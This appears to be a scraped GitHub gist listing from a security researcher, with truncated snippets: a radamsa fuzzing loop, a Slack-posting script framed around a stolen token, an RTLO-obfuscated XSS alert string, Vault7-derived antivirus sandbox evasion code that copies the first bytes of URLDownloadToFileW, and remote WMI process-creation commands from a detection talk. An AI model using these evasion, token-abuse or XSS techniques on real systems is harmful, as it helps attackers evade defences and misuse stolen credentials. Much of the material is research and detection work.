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Und3rf10w /
Last active August 28, 2018 17:21
Shell function to wrap radamsa against an application that takes one argument
while true; do
testcase=$(echo $2 | radamsa) # AAAA is the sample arguments you're passing to the application you're testing
echo -e "\n\n---TESTCASE---\n$testcase\n\n---OUTPUT---"
./$1 $testcase # tmp is the application to be fuzzed
test $? -gt 0 && break # if the fuzzed application returns anything that's not a 0, then break out of the loop
echo -e "\n---ENDOUTPUT---\n"
echo -e "---ENDCASE---\n"
echo -e "\n\n\e[0;31mAPPLICATION CRASHED\n\e[0mHexdump of input below:\n\n"
printf $testcase | hexdump -Cv | tee crash.hexdump # return a hexdump of the crashy input
Und3rf10w / 99-usb.rules
Created September 11, 2018 16:04
Udev Setup script to notify any changes to USB subsystem
# Udev rule in /etc/udev/rules.d/
ACTION=="add", RUN+="/usr/local/bin/udevnotify"
Und3rf10w /
Created October 8, 2018 13:25
For being a dick when you steal someone's slack token
# Usage: slackpost <token> <channel> <message>
# Enter the name of your slack host here - the thing that appears in your URL:
# Stolen apikey
Und3rf10w / reversed_ayyylmao_xss_rtlo
Created October 8, 2018 13:26
dumb rtlo trick for xss
printf "\u202e<tpircs/>('oamlyyyya')trela.wodniw<tpircs>\u202e" | xclip -sel clip
Und3rf10w / API
Created February 12, 2019 00:16
PSP (AV) Avoidance Snips taken from vault7


Kaspersky's sandbox environment has been known to have gaps in what it emulates when examining a process. One such example was found while testing a technique found in known-malware. The technique involved copying the first few assembly instructions of target Windows API functions to an executable buffer, then calling a jmp command after executing the copied instructions which would jmp to the rest of the API code. For example:

DWORD dwOldProtect;
HMODULE urlmon = LoadLibrary(L"Urlmon.dll");
BYTE* func = (BYTE*)GetProcAddress(urlmon, "URLDownloadToFileW");
memcpy(urlcode, func, 6);  //copy off the first 6 bytes (first few instructions) from the function to our buffer
lpUrlAddr += 6;
Und3rf10w /
Created April 23, 2019 21:05
A python script to generate system load and network connections with the idea to be used for rootkit debugging
import socket
import sys
from os import getpid
from multiprocessing import Pool
from multiprocessing import cpu_count
def f(x):
while True:
Und3rf10w / introspection-query.graphql
Created August 14, 2019 22:45 — forked from craigbeck/introspection-query.graphql
Introspection query for GraphQL
query IntrospectionQuery {
__schema {
queryType { name }
mutationType { name }
subscriptionType { name }
types {
directives {
Und3rf10w / HowToDetectTechniqueX_Demos.ps1
Created September 6, 2019 22:38 — forked from mattifestation/HowToDetectTechniqueX_Demos.ps1
Demo code from my DerbyCon talk: "How do I detect technique X in Windows?" Applied Methodology to Definitively Answer this Question
#region Attack validations
wmic /node: /user:Administrator /password:badpassword process call create notepad.exe
Invoke-WmiMethod -ComputerName -Credential Administrator -Class Win32_Process -Name Create -ArgumentList notepad.exe
$CimSession = New-CimSession -ComputerName -Credential Administrator
Invoke-CimMethod -CimSession $CimSession -ClassName Win32_Process -MethodName Create -Arguments @{ CommandLine = 'notepad.exe' }
$CimSession | Remove-CimSession
winrm --% invoke Create wmicimv2/Win32_Process @{CommandLine="notepad.exe"} -remote: -username:Administrator -password:badpassword
bits 64
jmp short message
pop rsi
xor rax,rax
mov al, 1
Und3rf10w /
Created October 26, 2019 17:31
Convert a binary file to a hexbyte string
#!/usr/bin/env python3
import binascii
import argparse
from os import path
parser = argparse.ArgumentParser(description ='Convert input raw binary file to a hex byte string')
parser.add_argument('-i', '--input', dest='input_file', required=True, help="The input file to convert")
parser.add_argument('-o', '--output', dest='output_file', required=False, help="The output file to write to")
args = parser.parse_args()